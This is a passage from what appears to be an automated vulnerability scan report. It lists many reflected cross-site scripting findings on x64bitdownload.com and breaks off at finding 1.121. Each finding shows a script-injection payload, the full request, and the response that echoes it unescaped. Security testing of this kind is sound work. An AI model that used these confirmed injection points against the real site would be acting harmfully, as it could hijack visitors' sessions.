1.106. http://www.x64bitdownload.com/64-bit-reading-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32cf3"><script>alert(1)</script>15bec155853 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reading-downloads.html32cf3"><script>alert(1)</script>15bec155853 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reading-downloads.html32cf3"><script>alert(1)</script>15bec155853" />
...[SNIP]...

1.107. http://www.x64bitdownload.com/64-bit-reading-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-reading-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0f20"><script>alert(1)</script>c2ca189390f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reading-downloads.html?a0f20"><script>alert(1)</script>c2ca189390f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reading-downloads.html?a0f20"><script>alert(1)</script>c2ca189390f=1" />
...[SNIP]...

1.108. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff5d"><script>alert(1)</script>01c8f498ee9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.htmlfff5d"><script>alert(1)</script>01c8f498ee9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-c-44-newsgroup-clients-downloads.htmlfff5d"><script>alert(1)</script>01c8f498ee9" />
...[SNIP]...

1.109. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a440d"><script>alert(1)</script>265b1c4833d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.html?a440d"><script>alert(1)</script>265b1c4833d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-c-44-newsgroup-clients-downloads.html?a440d"><script>alert(1)</script>265b1c4833d=1" />
...[SNIP]...

1.110. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1c3"><script>alert(1)</script>79bc88e940 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-client-downloads.html6f1c3"><script>alert(1)</script>79bc88e940 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-client-downloads.html6f1c3"><script>alert(1)</script>79bc88e940" />
...[SNIP]...

1.111. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-client-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3709f"><script>alert(1)</script>5d317c2536e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-client-downloads.html?3709f"><script>alert(1)</script>5d317c2536e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-client-downloads.html?3709f"><script>alert(1)</script>5d317c2536e=1" />
...[SNIP]...

1.112. http://www.x64bitdownload.com/64-bit-rss-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d337e"><script>alert(1)</script>9b144cad06d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-downloads.htmld337e"><script>alert(1)</script>9b144cad06d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-downloads.htmld337e"><script>alert(1)</script>9b144cad06d" />
...[SNIP]...

1.113. http://www.x64bitdownload.com/64-bit-rss-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a417"><script>alert(1)</script>14bc0d3550a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-downloads.html?4a417"><script>alert(1)</script>14bc0d3550a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-downloads.html?4a417"><script>alert(1)</script>14bc0d3550a=1" />
...[SNIP]...

1.114. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d26"><script>alert(1)</script>9a97b43768b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-feed-reader-downloads.html33d26"><script>alert(1)</script>9a97b43768b HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-feed-reader-downloads.html33d26"><script>alert(1)</script>9a97b43768b" />
...[SNIP]...

1.115. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-feed-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f12de"><script>alert(1)</script>770277e5ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-feed-reader-downloads.html?f12de"><script>alert(1)</script>770277e5ab7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-feed-reader-downloads.html?f12de"><script>alert(1)</script>770277e5ab7=1" />
...[SNIP]...

1.116. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2159a"><script>alert(1)</script>7cc8e154fd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-reader-downloads.html2159a"><script>alert(1)</script>7cc8e154fd6 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-reader-downloads.html2159a"><script>alert(1)</script>7cc8e154fd6" />
...[SNIP]...

1.117. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rss-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d02c9"><script>alert(1)</script>494377cbd72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-reader-downloads.html?d02c9"><script>alert(1)</script>494377cbd72=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 99975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-reader-downloads.html?d02c9"><script>alert(1)</script>494377cbd72=1" />
...[SNIP]...

1.118. http://www.x64bitdownload.com/64-bit-search-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f19f4"><script>alert(1)</script>42c8e9318d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-search-downloads.htmlf19f4"><script>alert(1)</script>42c8e9318d8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-search-downloads.htmlf19f4"><script>alert(1)</script>42c8e9318d8" />
...[SNIP]...

1.119. http://www.x64bitdownload.com/64-bit-search-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-search-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bf0d"><script>alert(1)</script>f1422490e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-search-downloads.html?4bf0d"><script>alert(1)</script>f1422490e1a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:06 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-search-downloads.html?4bf0d"><script>alert(1)</script>f1422490e1a=1" />
...[SNIP]...

1.120. http://www.x64bitdownload.com/64-bit-ssl-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 378a5"><script>alert(1)</script>edb593753a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-ssl-downloads.html378a5"><script>alert(1)</script>edb593753a9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-ssl-downloads.html378a5"><script>alert(1)</script>edb593753a9" />
...[SNIP]...

1.121. http://www.x64bitdownload.com/64-bit-ssl-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

